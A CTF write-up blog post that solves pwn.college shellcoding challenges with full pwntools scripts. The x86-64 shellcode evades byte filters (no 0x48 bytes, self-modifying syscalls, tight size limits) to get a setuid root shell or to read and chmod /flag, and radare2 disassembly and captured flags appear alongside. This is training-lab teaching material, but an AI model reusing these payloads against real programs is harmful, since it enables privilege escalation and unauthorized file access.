PwnCollege - Program Security - Shellcoding

Posted on 2026-03-26 In ctf Views: Disqus:

ello ackersl!

Write and execute shellcode to read the flag, but your inputted data is filtered before execution.

###
### Welcome to /challenge/ello-ackers!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x29e93000!
Reading 0x1000 bytes from stdin.

Executing filter...

This challenge requires that your shellcode have no H bytes!

Failed filter at byte 2048!

在 ASCII 码中，H 的十六进制是 0x48。在 x86-64 架构的机器码中，0x48 是 REX.W 前缀。任何对 64 位寄存器（如 rax, rdi, rsi）进行操作的指令，汇编器基本都会给它加上 0x48 前缀。

比如：

mov rax, 0x3b -> 48 c7 c0 3b 00 00 00
add rdi, 8 -> 48 83 c7 08

x86-64 架构有一个特性：对 32 位寄存器（如 eax, edi）进行操作时，CPU 会自动将该寄存器的高 32 位清零，并且不需要 REX.W 前缀。所以，mov eax, 2 对应的机器码是 b8 02 00 00 00

Method 1: Get root shell (setuid)

#!/usr/bin/env python3
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/ello-ackers"

# get root shell(setuid)
shellcode_asm = """
.global _start
_start:
.intel_syntax noprefix
    xor edi, edi
    push 105
    pop rax
    syscall

    xor esi, esi
    push rsi
    push rsi
    push rsp
    pop rdi

    mov dword ptr [rdi], 0x6e69622f
    mov dword ptr [rdi+4], 0x68732f2f

    push 59
    pop rax

    xor edx, edx
    syscall
"""

payload = asm(shellcode_asm)
print(payload)

log.info(f"Payload len: {len(payload)} bytes")
log.info(f"Payload Hex dump: \n{enhex(payload)}")

if b"\x48" in payload:
    log.error("detected 0x48 bytes in payload")
    exit(1)

p = process(target_binary)
p.send(payload)
p.interactive()

Method 2: Read flag directly

#!/usr/bin/env python3
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/ello-ackers"

shellcode_asm = """
.global _start
_start:
.intel_syntax noprefix
    xor esi, esi
    push rsi
    push rsp
    pop rdi

    mov dword ptr [rdi], 0x616c662f
    mov byte ptr [rdi+4], 0x67
    push 2
    pop rax
    syscall

    xchg eax, edi
    push rsp
    pop rsi
    mov dl, 100
    xor eax, eax
    syscall

    xchg eax, edx
    push 1
    pop rdi
    push 1
    pop rax
    syscall
"""

payload = asm(shellcode_asm)
print(payload)

log.info(f"Payload len: {len(payload)} bytes")
log.info(f"Payload Hex dump: \n{enhex(payload)}")

if b"\x48" in payload:
    log.error("detected 0x48 bytes in payload")
    exit(1)

p = process(target_binary)
p.send(payload)
p.interactive()

pwn.college{ogTy4tQHj3UmVxXesBT0tLjIPBx.0FMyIDL4cjM1gzW}

Syscall Smuggler

Write and execute shellcode to read the flag, but the inputted data cannot contain any form of system call bytes (syscall, sysenter, int), can you defeat this?

hacker@program-security~syscall-smuggler:~$ /challenge/syscall-smuggler ###
### Welcome to /challenge/syscall-smuggler!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x1a467000!
Reading 0x1000 bytes from stdin.

Solution: SMC (Self-Modifying Code)

#!/usr/bin/env python3
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/syscall-smuggler"

shellcode_asm = """
.section .shellcode,"awx"
.global _start
.global __start
_start:
__start:
.intel_syntax noprefix
.p2align 0
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c662f
    xor [rsp], rax
    push 2
    pop rax
    mov rdi, rsp
    xor esi, esi
    inc byte ptr [rip + patch_target1 + 1]
patch_target1:
    .byte 0x0f
    .byte 0x04

    mov r10d, 0x7fffffff
    mov rsi, rax
    push 40
    pop rax
    push 1
    pop rdi
    cdq
    inc byte ptr [rip + patch_target + 1]
patch_target:
    .byte 0x0f
    .byte 0x04
"""

payload = asm(shellcode_asm)
print(payload)

log.info(f"Payload len: {len(payload)} bytes")
log.info(f"Payload Hex dump: \n{enhex(payload)}")

if b"\x0f05" in payload:
    log.error("detected syscall bytes in payload")
    exit(1)

p = process(target_binary)
p.send(payload)
p.interactive()

pwn.college{sxAngc7P16UniMHkxwySW6LiF3L.0VMyIDL4cjM1gzW}

Syscall Shenanigans

Write and execute shellcode to read the flag, but the inputted data cannot contain any form of system call bytes (syscall, sysenter, int), this challenge adds an extra layer of difficulty!

hacker@program-security~syscall-shenanigans:~$ /challenge/syscall-shenanigans
###
### Welcome to /challenge/syscall-shenanigans!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x2000 bytes for shellcode at 0x229dc000!
Reading 0x2000 bytes from stdin.

This challenge requires that your shellcode does not have any `syscall`, 'sysenter', or `int` instructions. System calls
are too dangerous! This filter works by scanning through the shellcode for the following byte sequences: 0f05
(`syscall`), 0f34 (`sysenter`), and 80cd (`int`). One way to evade this is to have your shellcode modify itself to
insert the `syscall` instructions at runtime.

Removing write permissions from first 4096 bytes of shellcode. !!!!!!!!!!!!!!!!!

This challenge is about to execute the following shellcode:

      Address      |                      Bytes                    |          Instructions
------------------------------------------------------------------------------------------
0x00000000229dc000 | 48 b8 01 01 01 01 01 01 01 01                 | movabs rax, 0x101010101010101
0x00000000229dc00a | 50                                            | push rax
0x00000000229dc00b | 48 b8 2e 67 6d 60 66 01 01 01                 | movabs rax, 0x1010166606d672e
0x00000000229dc015 | 48 31 04 24                                   | xor qword ptr [rsp], rax
0x00000000229dc019 | 6a 02                                         | push 2
0x00000000229dc01b | 58                                            | pop rax
0x00000000229dc01c | 48 89 e7                                      | mov rdi, rsp
0x00000000229dc01f | 31 f6                                         | xor esi, esi
0x00000000229dc021 | fe 05 01 00 00 00                             | inc byte ptr [rip + 1]

Executing shellcode!

[*] Got EOF while reading in interactive

#!/usr/bin/env python3
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/syscall-shenanigans"

shellcode_asm = """
.section .shellcode,"awx"
.global _start
.global __start
_start:
__start:
.intel_syntax noprefix
.p2align 0
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c662f
    xor [rsp], rax
    push 2
    pop rax
    mov rdi, rsp
    xor esi, esi
    inc byte ptr [rip + patch_target1 + 1]
patch_target1:
    .byte 0x0f
    .byte 0x04

    mov r10d, 0x7fffffff
    mov rsi, rax
    push 40
    pop rax
    push 1
    pop rdi
    cdq
    inc byte ptr [rip + patch_target + 1]
patch_target:
    .byte 0x0f
    .byte 0x04
"""

payload = b"\x90" * 4096

payload += asm(shellcode_asm)

# log.info(f"Payload len: {len(payload)} bytes")
# log.info(f"Payload Hex dump: \n{enhex(payload)}")

if b"\x0f05" in payload:
    log.error("detected syscall bytes in payload")
    exit(1)

p = process(target_binary)
p.send(payload)
p.interactive()

pwn.college{sgSXh_BFf5M_15STVO05hkTbwud.0lMyIDL4cjM1gzW}

Byte Budget

Write and execute shellcode to read the flag, but you only get 18 bytes.

hacker@program-security~byte-budget:~$ /challenge/byte-budget
###
### Welcome to /challenge/byte-budget!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x14f5f000!
Reading 0x12 bytes from stdin.

Removing write permissions from first 4096 bytes of shellcode.

Disassembly analysis

r2 -A -q -c "pdf @ sym.main" /challenge/byte-budget

            ; ICOD XREF from entry0 @ 0x1241(r)
┌ 727: int main (int argc, char **argv, char **envp);
│ `- args(rdi, rsi, rdx) vars(6:sp[0x10..0x40])
│           0x00001567      f30f1efa       endbr64
│           0x0000156b      55             push rbp
│           0x0000156c      4889e5         mov rbp, rsp
│           0x0000156f      4883ec40       sub rsp, 0x40
│           0x00001573      897ddc         mov dword [var_24h], edi    ; argc
│           0x00001576      488975d0       mov qword [var_30h], rsi    ; argv
│           0x0000157a      488955c8       mov qword [var_38h], rdx    ; envp
│           0x0000157e      488b059b2a..   mov rax, qword [obj.stdin]  ; obj.stdin__GLIBC_2.2.5
│                                                                      ; [0x4020:8]=0
│           0x00001585      b900000000     mov ecx, 0                  ; size_t size
│           0x0000158a      ba02000000     mov edx, 2                  ; int mode
│           0x0000158f      be00000000     mov esi, 0                  ; char *buf
│           0x00001594      4889c7         mov rdi, rax                ; FILE*stream
│           0x00001597      e844fcffff     call sym.imp.setvbuf        ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│           0x0000159c      488b056d2a..   mov rax, qword [obj.stdout] ; obj.__TMC_END__
│                                                                      ; [0x4010:8]=0
│           0x000015a3      b900000000     mov ecx, 0                  ; size_t size
│           0x000015a8      ba02000000     mov edx, 2                  ; int mode
│           0x000015ad      be00000000     mov esi, 0                  ; char *buf
│           0x000015b2      4889c7         mov rdi, rax                ; FILE*stream
│           0x000015b5      e826fcffff     call sym.imp.setvbuf        ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│           0x000015ba      488d3d040c..   lea rdi, [0x000021c5]       ; "###" ; const char *s
│           0x000015c1      e87afbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000015c6      488b45d0       mov rax, qword [var_30h]
│           0x000015ca      488b00         mov rax, qword [rax]
│           0x000015cd      4889c6         mov rsi, rax
│           0x000015d0      488d3df20b..   lea rdi, str._Welcome_to__s__n ; 0x21c9 ; "### Welcome to %s!\n" ; const char *format
│           0x000015d7      b800000000     mov eax, 0
│           0x000015dc      e89ffbffff     call sym.imp.printf         ; int printf(const char *format)
│           0x000015e1      488d3ddd0b..   lea rdi, [0x000021c5]       ; "###" ; const char *s
│           0x000015e8      e853fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000015ed      bf0a000000     mov edi, 0xa                ; int c
│           0x000015f2      e839fbffff     call sym.imp.putchar        ; int putchar(int c)
│           0x000015f7      488d3de20b..   lea rdi, str.This_challenge_reads_in_some_bytes__modifies_them__depending_on_the_specific_challenge_configuration___and_executes_them ; 0x21e0 ; "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them" ; const char *s
│           0x000015fe      e83dfbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00001603      488d3d560c..   lea rdi, str.as_code__This_is_a_common_exploitation_scenario__called__code_injection_._Through_this_series_of_challenges__you_will ; 0x2260 ; "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will" ; const char *s
│           0x0000160a      e831fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x0000160f      488d3dc20c..   lea rdi, str.practice_your_shellcode_writing_skills_under_various_constraints__To_ensure_that_you_are_shellcoding__rather_than_doing ; 0x22d8 ; "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing" ; const char *s
│           0x00001616      e825fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x0000161b      488d3d2e0d..   lea rdi, str.other_tricks__this_will_sanitize_all_environment_variables_and_arguments_and_close_all_file_descriptors___2._n ; 0x2350 ; "other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n" ; const char *s
│           0x00001622      e819fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00001627      c745ec0300..   mov dword [fildes], 3
│       ┌─< 0x0000162e      eb0e           jmp 0x163e
│       │   ; CODE XREF from main @ 0x1645(x)
│      ┌──> 0x00001630      8b45ec         mov eax, dword [fildes]
│      ╎│   0x00001633      89c7           mov edi, eax                ; int fildes
│      ╎│   0x00001635      e876fbffff     call sym.imp.close          ; int close(int fildes)
│      ╎│   0x0000163a      8345ec01       add dword [fildes], 1
│      ╎│   ; CODE XREF from main @ 0x162e(x)
│      ╎└─> 0x0000163e      817dec0f27..   cmp dword [fildes], 0x270f  ; '\x0f\''
│      └──< 0x00001645      7ee9           jle 0x1630
│           0x00001647      488b45d0       mov rax, qword [var_30h]
│           0x0000164b      488945f0       mov qword [s], rax
│       ┌─< 0x0000164f      eb2b           jmp 0x167c
│       │   ; CODE XREF from main @ 0x1686(x)
│      ┌──> 0x00001651      488b45f0       mov rax, qword [s]
│      ╎│   0x00001655      488b00         mov rax, qword [rax]
│      ╎│   0x00001658      4889c7         mov rdi, rax                ; const char *s
│      ╎│   0x0000165b      e800fbffff     call sym.imp.strlen         ; size_t strlen(const char *s)
│      ╎│   0x00001660      4889c2         mov rdx, rax                ; size_t n
│      ╎│   0x00001663      488b45f0       mov rax, qword [s]
│      ╎│   0x00001667      488b00         mov rax, qword [rax]
│      ╎│   0x0000166a      be00000000     mov esi, 0                  ; int c
│      ╎│   0x0000166f      4889c7         mov rdi, rax                ; void *s
│      ╎│   0x00001672      e829fbffff     call sym.imp.memset         ; void *memset(void *s, int c, size_t n)
│      ╎│   0x00001677      488345f008     add qword [s], 8
│      ╎│   ; CODE XREF from main @ 0x164f(x)
│      ╎└─> 0x0000167c      488b45f0       mov rax, qword [s]
│      ╎    0x00001680      488b00         mov rax, qword [rax]
│      ╎    0x00001683      4885c0         test rax, rax
│      └──< 0x00001686      75c9           jne 0x1651
│           0x00001688      488b45c8       mov rax, qword [var_38h]
│           0x0000168c      488945f8       mov qword [var_8h], rax
│       ┌─< 0x00001690      eb2b           jmp 0x16bd
│       │   ; CODE XREF from main @ 0x16c7(x)
│      ┌──> 0x00001692      488b45f8       mov rax, qword [var_8h]
│      ╎│   0x00001696      488b00         mov rax, qword [rax]
│      ╎│   0x00001699      4889c7         mov rdi, rax                ; const char *s
│      ╎│   0x0000169c      e8bffaffff     call sym.imp.strlen         ; size_t strlen(const char *s)
│      ╎│   0x000016a1      4889c2         mov rdx, rax                ; size_t n
│      ╎│   0x000016a4      488b45f8       mov rax, qword [var_8h]
│      ╎│   0x000016a8      488b00         mov rax, qword [rax]
│      ╎│   0x000016ab      be00000000     mov esi, 0                  ; int c
│      ╎│   0x000016b0      4889c7         mov rdi, rax                ; void *s
│      ╎│   0x000016b3      e8e8faffff     call sym.imp.memset         ; void *memset(void *s, int c, size_t n)
│      ╎│   0x000016b8      488345f808     add qword [var_8h], 8
│      ╎│   ; CODE XREF from main @ 0x1690(x)
│      ╎└─> 0x000016bd      488b45f8       mov rax, qword [var_8h]
│      ╎    0x000016c1      488b00         mov rax, qword [rax]
│      ╎    0x000016c4      4885c0         test rax, rax
│      └──< 0x000016c7      75c9           jne 0x1692
│           0x000016c9      41b900000000   mov r9d, 0                  ; size_t offset
│           0x000016cf      41b800000000   mov r8d, 0                  ; int fd
│           0x000016d5      b922000000     mov ecx, 0x22               ; '\"' ; int flags
│           0x000016da      ba07000000     mov edx, 7                  ; int prot
│           0x000016df      be00100000     mov esi, sym._init          ; 0x1000 ; size_t length
│           0x000016e4      bf00f0f514     mov edi, 0x14f5f000         ; void*addr
│           0x000016e9      e882faffff     call sym.imp.mmap           ; void*mmap(void*addr, size_t length, int prot, int flags, int fd, size_t offset)
│           0x000016ee      4889054329..   mov qword [obj.shellcode], rax ; [0x4038:8]=0
│           0x000016f5      488b053c29..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x000016fc      483d00f0f514   cmp rax, 0x14f5f000
│       ┌─< 0x00001702      741f           je 0x1723
│       │   0x00001704      488d0d360e..   lea rcx, obj.__PRETTY_FUNCTION__.25265 ; 0x2541 ; "main" ; const char *function
│       │   0x0000170b      ba62000000     mov edx, 0x62               ; 'b' ; unsigned int line
│       │   0x00001710      488d35a90c..   lea rsi, str._challenge_babyshell_level_8.c ; 0x23c0 ; "/challenge/babyshell-level-8.c" ; const char *file
│       │   0x00001717      488d3dc20c..   lea rdi, str.shellcode___void__0x14f5f000 ; str.shellcode___void__0x14f5f000
│       │                                                              ; 0x23e0 ; "shellcode == (void *)0x14f5f000" ; const char *assertion
│       │   0x0000171e      e86dfaffff     call sym.imp.__assert_fail  ; void __assert_fail(const char *assertion, const char *file, unsigned int line, const char *function)
│       │   ; CODE XREF from main @ 0x1702(x)
│       └─> 0x00001723      488b050e29..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x0000172a      4889c6         mov rsi, rax
│           0x0000172d      488d3dcc0c..   lea rdi, str.Mapped_0x1000_bytes_for_shellcode_at__p__n ; str.Mapped_0x1000_bytes_for_shellcode_at__p__n
│                                                                      ; 0x2400 ; "Mapped 0x1000 bytes for shellcode at %p!\n" ; const char *format
│           0x00001734      b800000000     mov eax, 0
│           0x00001739      e842faffff     call sym.imp.printf         ; int printf(const char *format)
│           0x0000173e      488d3deb0c..   lea rdi, str.Reading_0x12_bytes_from_stdin._n ; str.Reading_0x12_bytes_from_stdin._n
│                                                                      ; 0x2430 ; "Reading 0x12 bytes from stdin.\n" ; const char *s
│           0x00001745      e8f6f9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x0000174a      488b05e728..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x00001751      ba12000000     mov edx, 0x12               ; size_t nbyte
│           0x00001756      4889c6         mov rsi, rax                ; void *buf
│           0x00001759      bf00000000     mov edi, 0                  ; int fildes
│           0x0000175e      e85dfaffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)
│           0x00001763      488905c628..   mov qword [obj.shellcode_size], rax ; [0x4030:8]=0
│           0x0000176a      488b05bf28..   mov rax, qword [obj.shellcode_size] ; [0x4030:8]=0
│           0x00001771      4885c0         test rax, rax
│       ┌─< 0x00001774      751f           jne 0x1795
│       │   0x00001776      488d0dc40d..   lea rcx, obj.__PRETTY_FUNCTION__.25265 ; 0x2541 ; "main" ; const char *function
│       │   0x0000177d      ba67000000     mov edx, 0x67               ; 'g' ; unsigned int line
│       │   0x00001782      488d35370c..   lea rsi, str._challenge_babyshell_level_8.c ; 0x23c0 ; "/challenge/babyshell-level-8.c" ; const char *file
│       │   0x00001789      488d3dc00c..   lea rdi, str.shellcode_size___0 ; 0x2450 ; "shellcode_size > 0" ; const char *assertion
│       │   0x00001790      e8fbf9ffff     call sym.imp.__assert_fail  ; void __assert_fail(const char *assertion, const char *file, unsigned int line, const char *function)
│       │   ; CODE XREF from main @ 0x1774(x)
│       └─> 0x00001795      488d3dcc0c..   lea rdi, str.Removing_write_permissions_from_first_4096_bytes_of_shellcode._n ; 0x2468 ; "Removing write permissions from first 4096 bytes of shellcode.\n" ; const char *s
│           0x0000179c      e89ff9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000017a1      488b059028..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x000017a8      ba05000000     mov edx, 5
│           0x000017ad      be00100000     mov esi, sym._init          ; 0x1000
│           0x000017b2      4889c7         mov rdi, rax
│           0x000017b5      e846faffff     call sym.imp.mprotect
│           0x000017ba      85c0           test eax, eax
│       ┌─< 0x000017bc      741f           je 0x17dd
│       │   0x000017be      488d0d7c0d..   lea rcx, obj.__PRETTY_FUNCTION__.25265 ; 0x2541 ; "main" ; const char *function
│       │   0x000017c5      ba6a000000     mov edx, 0x6a               ; 'j' ; unsigned int line
│       │   0x000017ca      488d35ef0b..   lea rsi, str._challenge_babyshell_level_8.c ; 0x23c0 ; "/challenge/babyshell-level-8.c" ; const char *file
│       │   0x000017d1      488d3dd00c..   lea rdi, str.mprotect_shellcode__4096__PROT_READPROT_EXEC___0 ; 0x24a8 ; "mprotect(shellcode, 4096, PROT_READ|PROT_EXEC) == 0" ; const char *assertion
│       │   0x000017d8      e8b3f9ffff     call sym.imp.__assert_fail  ; void __assert_fail(const char *assertion, const char *file, unsigned int line, const char *function)
│       │   ; CODE XREF from main @ 0x17bc(x)
│       └─> 0x000017dd      488d3dfc0c..   lea rdi, str.This_challenge_is_about_to_execute_the_following_shellcode:_n ; 0x24e0 ; "This challenge is about to execute the following shellcode:\n" ; const char *s
│           0x000017e4      e857f9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000017e9      488b154028..   mov rdx, qword [obj.shellcode_size] ; [0x4030:8]=0
│           0x000017f0      488b054128..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x000017f7      4889d6         mov rsi, rdx                ; int64_t arg2
│           0x000017fa      4889c7         mov rdi, rax                ; int64_t arg1
│           0x000017fd      e807fbffff     call sym.print_disassembly
│           0x00001802      488d3d140d..   lea rdi, [0x0000251d]       ; const char *s
│           0x00001809      e832f9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x0000180e      488d3d090d..   lea rdi, str.Executing_shellcode__n ; 0x251e ; "Executing shellcode!\n" ; const char *s
│           0x00001815      e826f9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x0000181a      488b051728..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
# shellcode in rdx
│           0x00001821      4889c2         mov rdx, rax
│           0x00001824      b800000000     mov eax, 0
│           0x00001829      ffd2           call rdx
│           0x0000182b      488d3d020d..   lea rdi, str._Goodbye_      ; 0x2534 ; "### Goodbye!" ; const char *s
│           0x00001832      e809f9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00001837      b800000000     mov eax, 0
│           0x0000183c      c9             leave
└           0x0000183d      c3             ret

程序在 call shellcode 之前，把 shellcode 的起始地址 (0x14f5f000) 塞进了 rdx 寄存器里。

可以直接把字符串硬编码在指令的末尾，然后用 rdx 来获取 ASCII 字符串的地址。

#!/usr/bin/env python3
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/byte-budget"

# syscall chmod
payload_asm = """
.intel_syntax noprefix
    lea rdi, [rdx + 12]
    push 4
    pop rsi
    push 90
    pop rax
    syscall
.ascii "/flag"
"""

payload = asm(payload_asm)
log.info(f"Payload length: {len(payload)} bytes (Arch Way Minimal!)")

p = process(target_binary)
p.send(payload)

p.wait()

import os

os.system("cat /flag")

pwn.college{c0WCX5hfQ61Xr0NdbS8GG93279M.0FNyIDL4cjM1gzW}

ClobberCode

Write and execute shellcode to read the flag, but this time your shellcode is partially overwritten with 0xcc (INT 3) every other 10 bytes.

hacker@program-security~clobbercode:~$ /challenge/clobbercode
###
### Welcome to /challenge/clobbercode!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x2e692000!
Reading 0x1000 bytes from stdin.

This challenge modified your shellcode by overwriting every other 10 bytes with 0xcc. 0xcc, when interpreted as an
instruction is an `INT 3`, which is an interrupt to call into the debugger. You must avoid these modifications in your
shellcode.

Removing write permissions from first 4096 bytes of shellcode.

This challenge is about to execute the following shellcode:

      Address      |                      Bytes                    |          Instructions
------------------------------------------------------------------------------------------
0x000000002e692000 | 31 ff                                         | xor edi, edi
0x000000002e692002 | 6a 69                                         | push 0x69
0x000000002e692004 | 58                                            | pop rax
0x000000002e692005 | 0f 05                                         | syscall
0x000000002e692007 | 31 f6                                         | xor esi, esi
0x000000002e692009 | 56                                            | push rsi
0x000000002e69200a | cc                                            | int3
0x000000002e69200b | cc                                            | int3
0x000000002e69200c | cc                                            | int3
0x000000002e69200d | cc                                            | int3
0x000000002e69200e | cc                                            | int3
0x000000002e69200f | cc                                            | int3
0x000000002e692010 | cc                                            | int3
0x000000002e692011 | cc                                            | int3
0x000000002e692012 | cc                                            | int3
0x000000002e692013 | cc                                            | int3
0x000000002e692014 | 47 04 2f                                      | add al, 0x2f

Executing shellcode!

[*] Got EOF while reading in interactive

#!/usr/bin/env python3
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/clobbercode"

payload_asm = """
.intel_syntax noprefix

xor eax, eax
push rax
mov eax, 0x67616c66
jmp b2

.rept 10
nop
.endr

b2:
shl rax, 8
mov al, 0x2f
nop
nop
jmp b3

.rept 10
nop
.endr

b3:
push rax
push rsp
pop rdi
push 4
pop rsi
nop
nop
jmp b4

.rept 10
nop
.endr

b4:
push 90
pop rax
syscall
"""

payload = asm(payload_asm)
log.info(f"Generated Payload Size: {len(payload)} bytes")

p = process(target_binary)
p.send(payload)
p.wait()

import os
os.system("cat /flag")

pwn.college{QOtrCvTfAfczjbdUxqvPYGKqWTY.0VNyIDL4cjM1gzW}

Diverse Delivery

Write and execute shellcode to read the flag, but every byte in your input must be unique.

hacker@program-security~diverse-delivery:~$ /challenge/diverse-delivery ###
### Welcome to /challenge/diverse-delivery!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x237a3000!
Reading 0x1000 bytes from stdin.

#!/usr/bin/env python3
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/diverse-delivery"

# 20 bytes of pure unique perfection
payload_asm = """
.intel_syntax noprefix
    movabs rbx, 0x02010067616c662f
    push rbx
    push rsp
    pop rdi
    push 0x3f
    pop rsi
    mov al, 90
    syscall
"""

payload = asm(payload_asm)

unique_bytes = set(payload)

p = process(target_binary)
p.send(payload)
p.wait()

import os
os.system("cat /flag")

pwn.college{k-QnO4vkMzyh_61th5kjPIrt_UL.0FOyIDL4cjM1gzW}

Pocket Payload

Write and execute shellcode to read the flag, but this time you only get 12 bytes!

hacker@program-security~pocket-payload:~$ /challenge/pocket-payload
###
### Welcome to /challenge/pocket-payload!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x19902000!
Reading 0xc bytes from stdin.

#!/usr/bin/env python3
from pwn import *
import os

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/pocket-payload"

payload_asm = """
.intel_syntax noprefix
    push rdx
    pop rdi
    push 0x3f
    pop rsi
    mov al, 90
    syscall
"""

payload = asm(payload_asm).ljust(12, b"\x90")

log.info(f"Payload (also our symlink name): {payload}")

try:
    os.remove(payload)
except OSError:
    pass

os.symlink(b"/flag", payload)

p = process(target_binary)
p.send(payload)

p.wait()

os.system("cat /flag")

Micro Menace

Write and execute shellcode to read the flag, but this time you only get 6 bytes :)

hacker@program-security~micro-menace:~$ /challenge/micro-menace
###
### Welcome to /challenge/micro-menace!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x19f00000!
Reading 0x6 bytes from stdin.

            ; ICOD XREF from entry0 @ 0x1221(r)
┌ 655: int main (int argc, char **argv, char **envp);
│ `- args(rdi, rsi, rdx) vars(6:sp[0x10..0x40])
│           0x00001547      f30f1efa       endbr64
│           0x0000154b      55             push rbp
│           0x0000154c      4889e5         mov rbp, rsp
│           0x0000154f      4883ec40       sub rsp, 0x40
│           0x00001553      897ddc         mov dword [var_24h], edi    ; argc
│           0x00001556      488975d0       mov qword [var_30h], rsi    ; argv
│           0x0000155a      488955c8       mov qword [var_38h], rdx    ; envp
│           0x0000155e      488b05bb2a..   mov rax, qword [obj.stdin]  ; obj.stdin__GLIBC_2.2.5
│                                                                      ; [0x4020:8]=0
│           0x00001565      b900000000     mov ecx, 0                  ; size_t size
│           0x0000156a      ba02000000     mov edx, 2                  ; int mode
│           0x0000156f      be00000000     mov esi, 0                  ; char *buf
│           0x00001574      4889c7         mov rdi, rax                ; FILE*stream
│           0x00001577      e854fcffff     call sym.imp.setvbuf        ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│           0x0000157c      488b058d2a..   mov rax, qword [obj.stdout] ; obj.__TMC_END__
│                                                                      ; [0x4010:8]=0
│           0x00001583      b900000000     mov ecx, 0                  ; size_t size
│           0x00001588      ba02000000     mov edx, 2                  ; int mode
│           0x0000158d      be00000000     mov esi, 0                  ; char *buf
│           0x00001592      4889c7         mov rdi, rax                ; FILE*stream
│           0x00001595      e836fcffff     call sym.imp.setvbuf        ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│           0x0000159a      488d3d240c..   lea rdi, [0x000021c5]       ; "###" ; const char *s
│           0x000015a1      e88afbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000015a6      488b45d0       mov rax, qword [var_30h]
│           0x000015aa      488b00         mov rax, qword [rax]
│           0x000015ad      4889c6         mov rsi, rax
│           0x000015b0      488d3d120c..   lea rdi, str._Welcome_to__s__n ; 0x21c9 ; "### Welcome to %s!\n" ; const char *format
│           0x000015b7      b800000000     mov eax, 0
│           0x000015bc      e8affbffff     call sym.imp.printf         ; int printf(const char *format)
